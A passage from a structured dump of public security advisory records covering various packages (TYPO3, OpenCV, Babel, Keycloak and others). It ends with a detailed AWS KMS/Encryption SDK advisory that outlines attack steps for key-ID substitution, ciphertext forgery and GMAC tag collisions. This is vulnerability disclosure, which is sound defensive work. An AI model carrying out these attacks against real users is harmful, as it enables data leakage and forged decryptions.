described. + +### Credits +Thanks to Richie Lee who reported this issue and to TYPO3 core & security team members Benni Mack and Oliver Hader who fixed the issue. + +### References +* [TYPO3-CORE-SA-2021-014](https://typo3.org/security/advisory/typo3-core-sa-2021-014) +* [CVE-2020-11069](https://nvd.nist.gov/vuln/detail/CVE-2020-11069) reintroduced in TYPO3 v11.2.0","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.2.0'}, {'fixed': '11.5.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/TYPO3/typo3/security/advisories/GHSA-657m-v5vm-f6rw'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11069'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41113'}, {'type': 'WEB', 'url': 'https://github.com/TYPO3/typo3/commit/fa51999203c5e5d913ecae5ea843ccb2b95fa33f'}, {'type': 'PACKAGE', 'url': 'https://github.com/TYPO3/typo3'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-core-sa-2020-006'}]","{'cwe_ids': ['CWE-309', 'CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-05T18:48:07Z', 'nvd_published_at': '2021-10-05T18:15:00Z'}" +1.4.0,GHSA-pfj7-w373-gqch,2021-10-29T13:49:08Z,2021-10-28T23:14:21Z,,['CVE-2021-3900'],Cross-Site Request Forgery in firefly-iii,firefly-iii is vulnerable to Cross-Site Request Forgery (CSRF).,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'grumpydictator/firefly-iii'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '5.6.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3900'}, {'type': 'WEB', 'url': 'https://github.com/firefly-iii/firefly-iii/commit/c2c8c42ef3194d1aeba8c48240fe2e9063f77635'}, {'type': 'PACKAGE', 'url': 'https://github.com/firefly-iii/firefly-iii'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/909e55b6-ef02-4143-92e4-bc3e8397db76'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-28T21:13:22Z', 'nvd_published_at': '2021-10-27T18:15:00Z'}" +1.4.0,GHSA-gxmc-5wj3-jx64,2021-10-05T16:02:20Z,2021-10-04T20:13:25Z,,['CVE-2021-41467'],Cross-site scripting in application/controllers/dropbox.php in JustWriting,Cross-site scripting (XSS) vulnerability in application/controllers/dropbox.php in JustWriting 1.0.0 and below allow remote attackers to inject arbitrary web script or HTML via the challenge parameter.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'hjue/justwriting'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41467'}, {'type': 'WEB', 'url': 'https://github.com/hjue/JustWriting/issues/106'}, {'type': 'PACKAGE', 'url': 'https://github.com/hjue/JustWriting'}, {'type': 'WEB', 'url': 'https://github.com/hjue/JustWriting/'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-04T13:46:27Z', 'nvd_published_at': '2021-10-01T16:15:00Z'}" +1.4.0,GHSA-2w3f-9w3q-qw77,2021-10-20T17:12:24Z,2021-10-12T18:30:37Z,,['CVE-2021-23448'],Prototype Pollution in config-handler,All versions of package config-handler are vulnerable to Prototype Pollution when loading config files.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'config-handler'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.0.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23448'}, {'type': 'WEB', 'url': 'https://github.com/jarradseers/config-handler/issues/1'}, {'type': 'PACKAGE', 'url': 'https://github.com/jarradseers/config-handler'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-CONFIGHANDLER-1564947'}]","{'cwe_ids': ['CWE-913'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-10-12T17:01:08Z', 'nvd_published_at': '2021-10-11T21:15:00Z'}" +1.4.0,GHSA-cx2r-mf6x-55rx,2021-10-08T22:31:21Z,2021-10-12T16:01:36Z,,['CVE-2020-5273'],Stored XSS with custom URLs in PrestaShop module ps_linklist,"### Impact +Stored XSS when using custom URLs. + +### Patches +The problem is fixed in 3.1.0 + +### References +[Cross-site Scripting (XSS) - Stored (CWE-79)](https://cwe.mitre.org/data/definitions/79.html)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'prestashop/ps_linklist'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/PrestaShop/ps_linklist/security/advisories/GHSA-cx2r-mf6x-55rx'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-5273'}, {'type': 'WEB', 'url': 'https://github.com/PrestaShop/ps_linklist/commit/83e6e0bdda2287f4d6e64127cb90c41d26b5ad82'}, {'type': 'PACKAGE', 'url': 'https://github.com/PrestaShop/ps_linklist'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-08T22:31:21Z', 'nvd_published_at': '2020-04-16T22:15:00Z'}" +1.4.0,GHSA-wv83-jrfh-rp33,2021-10-21T14:56:27Z,2021-10-18T19:44:32Z,,['CVE-2021-42227'],Cross site scripting in kindeditor,Cross SIte Scripting (XSS) vulnerability exists in KindEditor 4.1.x via a Google search inurl:/examples/uploadbutton.html and then the .html file on the website that uses this editor (the file suffix is allowed).,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'kindeditor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '4.1.12'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-42227'}, {'type': 'WEB', 'url': 'https://github.com/kindsoft/kindeditor/issues/336'}, {'type': 'PACKAGE', 'url': 'https://github.com/kindsoft/kindeditor'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-15T17:38:42Z', 'nvd_published_at': '2021-10-14T17:15:00Z'}" +1.4.0,GHSA-hxfw-jm98-v4mq,2021-11-18T15:27:49Z,2021-10-12T22:21:56Z,,['CVE-2019-15939'],Divide By Zero in OpenCV.,An issue was discovered in OpenCV 4.1.0 (OpenCV-Python 4.1.0.25). There is a divide-by-zero error in cv::HOGDescriptor::getDescriptorSize in modules/objdetect/src/hog.cpp.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'opencv-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.1.1.26'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.1.0.25'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-python-headless'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.1.1.26'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.1.0.25'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.1.1.26'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.1.0.25'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python-headless'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.1.1.26'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.1.0.25'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-15939'}, {'type': 'WEB', 'url': 'https://github.com/OpenCV/opencv/issues/15287'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/pull/15382'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencv/opencv-python'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/10/msg00028.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2019-12/msg00025.html'}]","{'cwe_ids': ['CWE-369'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-06T20:35:29Z', 'nvd_published_at': '2019-09-05T16:15:00Z'}" +1.4.0,GHSA-7m27-3587-83xf,2021-10-20T15:06:01Z,2021-10-21T17:46:27Z,,['CVE-2019-10170'],Privilege Defined With Unsafe Actions in Keycloak,"A flaw was found in the Keycloak admin console, where the realm management interface permits a script to be set via the policy. This flaw allows an attacker with authenticated user and realm management permissions to configure a malicious script to trigger and execute arbitrary code with the permissions of the application user.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.keycloak:keycloak-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-10170'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10170'}, {'type': 'PACKAGE', 'url': 'https://github.com/keycloak/keycloak'}]","{'cwe_ids': ['CWE-267'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-20T15:06:01Z', 'nvd_published_at': '2020-05-08T14:15:00Z'}" +1.4.0,GHSA-267x-w5hx-8hjr,2021-11-18T15:30:14Z,2021-10-12T22:02:45Z,,['CVE-2017-12864'],Integer Overflow or Wraparound in OpenCV,"In opencv/modules/imgcodecs/src/grfmt_pxm.cpp, function ReadNumber did not checkout the input length, which lead to integer overflow. If the image is from remote, may lead to remote code execution or denial of service. This affects OpenCV 3.3 (corresponding with OpenCV-Python version 3.3.0.9) and earlier.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'opencv-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.1.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.0.9'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.1.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.0.9'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-12864'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/issues/9372'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/pull/9376'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencv/opencv-python'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2018/07/msg00030.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/10/msg00028.html'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/201712-02'}]","{'cwe_ids': ['CWE-190'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-07T20:35:35Z', 'nvd_published_at': '2017-08-15T16:29:00Z'}" +1.4.0,GHSA-p75j-wc34-527c,2021-10-08T23:04:41Z,2021-10-12T16:31:59Z,,['CVE-2019-10217'],Exposure of Sensitive Information to an Unauthorized Actor in ansible,A flaw was found in ansible 2.8.0 before 2.8.4. Fields managing sensitive data should be set as such by no_log feature. Some of these fields in GCP modules are not set properly. service_account_contents() which is common class for all gcp modules is not setting no_log to True. Any sensitive data managed by that function would be leak as an output when running ansible playbooks.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.8.0'}, {'fixed': '2.8.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-10217'}, {'type': 'WEB', 'url': 'https://github.com/ansible/ansible/issues/56269'}, {'type': 'WEB', 'url': 'https://github.com/ansible/ansible/pull/59427'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10217'}, {'type': 'PACKAGE', 'url': 'https://github.com/ansible/ansible'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00021.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00026.html'}]","{'cwe_ids': ['CWE-200'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-08T23:04:41Z', 'nvd_published_at': '2019-11-25T16:15:00Z'}" +1.4.0,GHSA-h4m5-qpfp-3mpv,2021-10-27T17:06:39Z,2021-10-21T17:49:59Z,,['CVE-2021-42771'],Directory Traversal in Babel,"Babel.Locale in Babel before 2.9.1 allows attackers to load arbitrary locale .dat files (containing serialized Python objects) via directory traversal, leading to code execution.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'babel'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.9.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-42771'}, {'type': 'WEB', 'url': 'https://github.com/python-babel/babel/pull/782'}, {'type': 'PACKAGE', 'url': 'https://github.com/python-babel/babel/'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/10/msg00018.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts/2021/10/msg00040.html'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-5018'}, {'type': 'WEB', 'url': 'https://www.tenable.com/security/research/tra-2021-14'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-21T14:33:55Z', 'nvd_published_at': '2021-10-20T21:15:00Z'}" +1.4.0,GHSA-m2jh-fxw4-gphm,2021-10-05T18:47:01Z,2021-10-05T20:23:35Z,,['CVE-2021-41114'],HTTP Host Header Injection,"### Meta +* CVSS: `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:F/RL:O/RC:C` (3.5) + +### Problem +It has been discovered that TYPO3 CMS is susceptible to host spoofing due to improper validation of the HTTP _Host_ header. TYPO3 uses the HTTP _Host_ header, for example, to generate absolute URLs during the frontend rendering process. Since the host header itself is provided by the client, it can be forged to any value, even in a name-based virtual hosts environment. + +This vulnerability is the same as described in [TYPO3-CORE-SA-2014-001 (CVE-2014-3941)](https://typo3.org/security/advisory/typo3-core-sa-2014-001/). A regression, introduced during TYPO3 v11 development, led to this situation. The already existing setting _$GLOBALS['TYPO3_CONF_VARS']['SYS']['trustedHostsPattern']_ (used as an effective mitigation strategy in previous TYPO3 versions) was not evaluated anymore, and reintroduced the vulnerability. + +### Solution +Update your instance to TYPO3 version 11.5.0 which addresses the problem described. + +### Credits +Thanks to TYPO3 framework merger Benjamin Franzke who reported and fixed the issue. + +### References +* [TYPO3-CORE-SA-2021-015](https://typo3.org/security/advisory/typo3-core-sa-2021-015) +* [CVE-2014-3941](https://nvd.nist.gov/vuln/detail/CVE-2014-3941) reintroduced in TYPO3 v11.0.0","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0'}, {'fixed': '11.5.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/TYPO3/typo3/security/advisories/GHSA-m2jh-fxw4-gphm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2014-3941'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41114'}, {'type': 'WEB', 'url': 'https://github.com/TYPO3/typo3/commit/5cbff85506cebe343e5ae59228977547cf8e3cf4'}, {'type': 'PACKAGE', 'url': 'https://github.com/TYPO3/typo3'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-core-sa-2021-015'}]","{'cwe_ids': ['CWE-20', 'CWE-644'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-05T18:47:01Z', 'nvd_published_at': '2021-10-05T18:15:00Z'}" +1.4.0,GHSA-r56q-vv3c-6g9c,2021-10-19T18:06:09Z,2021-10-19T20:16:26Z,,['CVE-2021-41150'],Improper sanitization of delegated role names,"### Impact +The tough library, prior to 0.12.0, does not properly sanitize delegated role names when caching a repository, or when loading a repository from the filesystem. When the repository is cached or loaded, files ending with the .json extension could be overwritten with role metadata anywhere on the system. + +AWS would like to thank https://github.com/jku for reporting this issue. + +### Patches +A fix is available in version 0.12.0. + +### Workarounds +No workarounds to this issue are known. + +### References +https://github.com/theupdateframework/python-tuf/security/advisories/GHSA-wjw6-2cqr-j4qr +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'tough'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.12.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/awslabs/tough/security/advisories/GHSA-r56q-vv3c-6g9c'}, {'type': 'WEB', 'url': 'https://github.com/theupdateframework/python-tuf/security/advisories/GHSA-wjw6-2cqr-j4qr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41150'}, {'type': 'WEB', 'url': 'https://github.com/awslabs/tough/commit/1809b9bd1106d78a51fbea3071aa97a3530bac9a'}, {'type': 'PACKAGE', 'url': 'https://github.com/awslabs/tough'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-19T18:06:09Z', 'nvd_published_at': '2021-10-19T20:15:00Z'}" +1.4.0,GHSA-wqgp-vphw-hphf,2021-10-08T22:24:29Z,2021-10-12T16:01:12Z,,['CVE-2020-8897'],Security issues in AWS KMS and AWS Encryption SDKs: in-band protocol negotiation and robustness,"Authors: Thai ""[thaidn](https://twitter.com/xorninja)"" Duong + +# Summary + +The following security vulnerabilities was discovered and reported to Amazon, affecting AWS KMS and all versions of [AWS Encryption SDKs](https://docs.aws.amazon.com/encryption-sdk/latest/developer-guide/introduction.html) prior to version 2.0.0: + +* **Information leakage**: an attacker can create ciphertexts that would leak the user’s AWS account ID, encryption context, user agent, and IP address upon decryption +* **Ciphertext forgery**: an attacker can create ciphertexts that are accepted by other users +* **Robustness**: an attacker can create ciphertexts that decrypt to different plaintexts for different users + +The first two bugs are somewhat surprising because they show that the ciphertext format can lead to vulnerabilities. These bugs (and the infamous [alg: ""None""](https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries/) bugs in JWT) belong to a class of vulnerabilities called **in-band protocol negotiation**. This is the second time we’ve found in-band protocol negotiation vulnerabilities in AWS cryptography libraries; see this [bug](https://github.com/google/security-research/security/advisories/GHSA-7f33-f4f5-xwgw) in S3 Crypto SDK discovered by my colleague Sophie Schmieg. + +In JWT and S3 SDK the culprit is the algorithm field—here it is the key ID. Because the key ID is used to determine which decryption key to use, it can’t be meaningfully authenticated despite being under the attacker’s control. If the key ID is a URL indicating where to fetch the key, the attacker can replace it with their own URL, and learn side-channel information such as the timing and machines on which the decryption happens (this can also lead to [SSRF](https://portswigger.net/web-security/ssrf) issues, but that’s another topic for another day). + +In AWS, the key ID is a unique [Amazon Resource Name](https://docs.aws.amazon.com/general/latest/gr/aws-arns-and-namespaces.html). If an attacker were to capture a ciphertext from a user and replace its key ID with their own, the victim’s AWS account ID, encryption context, user agent, and IP address would be logged to the attacker’s AWS account whenever the victim attempted to decrypt the modified ciphertext. + +The last bug shows that the non-committing property of AES-GCM (and other AEAD ciphers such as [AES-GCM-SIV](https://keymaterial.net/2020/09/07/invisible-salamanders-in-aes-gcm-siv/) or (X)ChaCha20Poly1305) is especially problematic in multi-recipient settings. These ciphers have a property that can cause nonidentical plaintexts when decrypting a single ciphertext with two different keys! For example, you can send a single encrypted email to Alice and Bob which, upon decryption, reads “attack” to Alice and “retreat” to Bob. The AWS Encryption SDKs are vulnerable to this attack because they allow a single ciphertext to be generated for multiple recipients, with each decrypting using a different key. I believe this kind of problem is prevalent. I briefly looked at [JWE](https://tools.ietf.org/html/rfc7516) and I think it is vulnerable. + +# Mitigations + +Amazon has fixed these bugs in release 2.0.0 of the SDKs. A new major version was required because, unfortunately, the fix for the last bug requires a breaking change from earlier versions. All users are recommended to upgrade. More details about Amazon’s mitigations can be found in [their announcement](https://aws.amazon.com/blogs/security/improved-client-side-encryption-explicit-keyids-and-key-commitment/). + +We’re collaborating with Shay Gueron on a paper regarding fast committing AEADs. + +# Vulnerabilities + +## Information Leakage + +The [Encrypt](https://docs.aws.amazon.com/kms/latest/APIReference/API_Encrypt.html) API in AWS KMS encrypts plaintext into ciphertext by using a customer master key (CMK). The ciphertext format is undocumented, but it contains metadata that specifies the CMK and the encryption algorithm. I reverse-engineered the format and found the location of the CMK. Externally the CMK is identified by its key ARN, but within a ciphertext it is represented by an internal ID, which remained stable during my testing. + +When I replaced the internal ID of a CMK in a ciphertext with the internal ID of another CMK, I found that AWS KMS attempted to decrypt the ciphertext with the new CMK. The encryption failed and the failure event—including the AWS Account ID, the user agent and the IP address of the caller—was logged to Cloud Trail in the account that owned the replacement CMK. + +This enables the following attack: +* The attacker creates a CMK that has a key policy that allows access from everyone. This requires no prior knowledge about the victim. +* The attacker intercepts a ciphertext from the victim, and replaces its CMK with their CMK. +* Whenever the victim attempts to decrypt the modified ciphertext, the attacker learns the timing of such actions, the victim’s AWS Account ID, user agent, encryption context, and IP address. + +This attack requires the victim to have an IAM policy that allows them to access the attacker’s CMK. I found that this practice was allowed by the AWS Visual Policy Editor, but I don’t know whether it is common. + +The AWS Encryption SDKs also succumb to this attack. The SDKs implement envelope encryption: encrypting data with a data encryption key (DEK) and then wrapping the DEK with a CMK using the Encrypt API in AWS KMS. The wrapped DEK is stored as part of the final ciphertext (format is defined [here](https://docs.aws.amazon.com/encryption-sdk/latest/developer-guide/message-format.html)). The attacker can mount this attack by replacing the CMK in the wrapped DEK with their own. + +``` +{ + ""eventVersion"": ""1.05"", + ""userIdentity"": { + ""type"": ""AWSAccount"", + ""principalId"": """", + ""accountId"": """" + }, + ""eventTime"": ""2020-06-21T21:05:04Z"", + ""eventSource"": ""kms.amazonaws.com"", + ""eventName"": ""Decrypt"", + ""awsRegion"": ""us-west-2"", + ""sourceIPAddress"": """", + ""userAgent"": """", + ""errorCode"": ""InvalidCiphertextException"", + ""requestParameters"": { + // The encryption context might include other data from the victim + ""encryptionContext"": { + ""aws-crypto-public-key"": ""AzfNOGOnNYFmpHspKrAm1L6XtRybONkmkhmB/IriKSA7b2NsV4MEPMph9yX2KTPKWw=="" + }, + ""encryptionAlgorithm"": ""SYMMETRIC_DEFAULT"" + }, + ""responseElements"": null, + ""requestID"": ""aeced8e8-75a2-42c3-96ac-d1fa2a1c5ee6"", + ""eventID"": ""780a0a6e-4ad8-43d4-a426-75d05022f870"", + ""readOnly"": true, + ""resources"": [ + { + ""accountId"": """", + ""type"": ""AWS::KMS::Key"", + ""ARN"": + } + ], + ""eventType"": ""AwsApiCall"", + ""recipientAccountId"": """", + ""sharedEventID"": ""033e147c-8a36-42f5-9d6c-9e071eb752b7"" +} +``` +**Figure 1: A failure event logged to the attacker’s Cloud Trail when the victim attempted to decrypt a modified ciphertext containing the attacker’s CMK.** + +## Ciphertext Forgery + +The [Decrypt](https://docs.aws.amazon.com/kms/latest/APIReference/API_Decrypt.html) API in AWS KMS doesn’t require the caller to specify the CMK. This parameter is required only when the ciphertext was encrypted under an asymmetric CMK. Otherwise, AWS KMS uses the metadata that it adds to the ciphertext blob to determine which CMK was used to encrypt the ciphertext. + +This leads to the following attack: +* The attacker creates a CMK that has a key policy that allows access from everyone. This requires no prior knowledge about the victim. +* The attacker generates a ciphertext by calling the Encrypt API with their key. +* The attacker intercepts a ciphertext from the victim, and replaces it entirely with their ciphertext. +* The victim successfully decrypts the ciphertext, as if it was encrypted under their own key. The attacker also learns when this happened, the victim’s AWS Account ID, user agent, encryption context, and IP address. + +Similar to the information leakage attack, this attack also requires the victim to have an IAM policy that allows them to access the attacker’s CMK. + +The AWS Encryption SDKs also succumb to this attack. They don’t specify the CMK when they call the Decrypt API to unwrap the DEK. + +## Robustness + +The AWS Encryption SDKs allow a single ciphertext to be generated for multiple recipients, with each decrypting using a different key. To that end, it wraps the DEK multiple times, each under a different CMK. The wrapped DEKs can be combined to form a single ciphertext which can be sent to multiple recipients who can use their own credentials to decrypt it. It’s reasonable to expect that all recipients should decrypt the ciphertext to an identical plaintext. However, because of the use of AES-GMAC and AES-GCM, it’s possible to create a ciphertext that decrypts to two valid yet different plaintexts for two different users. In other words, the AWS Encryption SDKs are [not](https://eprint.iacr.org/2008/440.pdf) [robust](https://eprint.iacr.org/2019/016.pdf). + +The encryption of a message under two CMKs can be summarized as follows: +* A DEK is randomly generated, and two wrapped DEKs are produced by calling the Encrypt API using the two CMKs +* A per-message AES-GCM key (K) is derived using HKDF from the DEK, a randomly generated message ID, and a fixed algorithm ID. +* A header is formed from the wrapped DEKs, the encryption context, and other metadata. A header authentication tag is computed on the header using AES-GMAC with K and a zero IV. +* The message is encrypted using AES-GCM with K, a non-zero IV, and fixed associated additional data. This produces a message authentication tag. +* The ciphertext consists of the header, the header authentication tag, the encrypted message, and the message authentication tag. + +(There’s also a self-signed digital signature that is irrelevant to this discussion). + +In order to decrypt a ciphertext, the AWS Encryption SDKs loops over the list of wrapped DEKs and returns the first one that it can successfully unwrap. The attacker therefore can wrap a unique DEK for each recipient. Next, the attacker exploits the non-committing property of GMAC to produce two messages that have the same GMAC tag under two different keys. The attacker has to do this twice, one for the header authentication tag and one for the message authentication tag. + +``` +Given a data blob B of one 128-bit block B_1, a GMAC tag is computed as follows: + +B_1 * H^2 + B_len * H + J + +where H and J depends on the key and B_len depends on the length of B. + +To find a message that can produce the same tag under two different keys, one +can add append to B a new block B_2 whose value can be deduced by solving +an algebraic equation. That is, we want to find B_2 such that: + +B_1 * H^3 + B_2 * H^2 + B_len * H + J = B_1 * H’^3 + B_2 * H’^2 + B_len * H’ + J’ + +where H’ and J’ are the corresponding H and J of the other key. + +B_2 is the only unknown value in this equation, thus it can be computed using +finite field arithmetics of GF(2^128): + +B_2 = [B_1 * (H^3+H’^3) + B_len * (H + H’) + J + J’] * (H^2 + H’^2)^-1. +``` +**Figure 2: How to find a message that has the same GMAC tag under two different keys.** + +The overall attack works as follows: +* The attacker generates a random DEK, derives a per-message key K, and encrypts message M with it using AES in counter mode. This generates a ciphertext C. +* The attacker generates another random DEK’, derives a per-message key K’, and performs trial decryption of C until the decrypted message M’ has desirable properties. For example, if the attacker wants the first bit of M’ different from that of M, this process should only take a few attempts. +* The attacker finds a block C* such that the GMAC of C’ = C || C* under K and K’ are identical. Denote this tag C’_tag. +* The attacker wraps DEK and DEK’ under two recipients’ CMK. +* The attacker forms a header H and adds a block H* to the encryption context such that the new H’ has the same authentication tag H’_tag under K and K’. +* The attacker output H’, H’_tag, C’, C’_tag. + +This attack is similar to the one discovered in [Facebook Messenger](https://eprint.iacr.org/2019/016.pdf). + +# Acknowledgement + +I’m grateful to Jen Barnason for carefully editing this advisory. I will never publish anything without her approval! I want to thank my friend and coworker Sophie “Queen of Hashing” Schmieg for wonderful discussions and for showing me how the arithmetic in GF(2^128) works. I want to thank Jonathan Bannet for asking the questions that led to this work.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 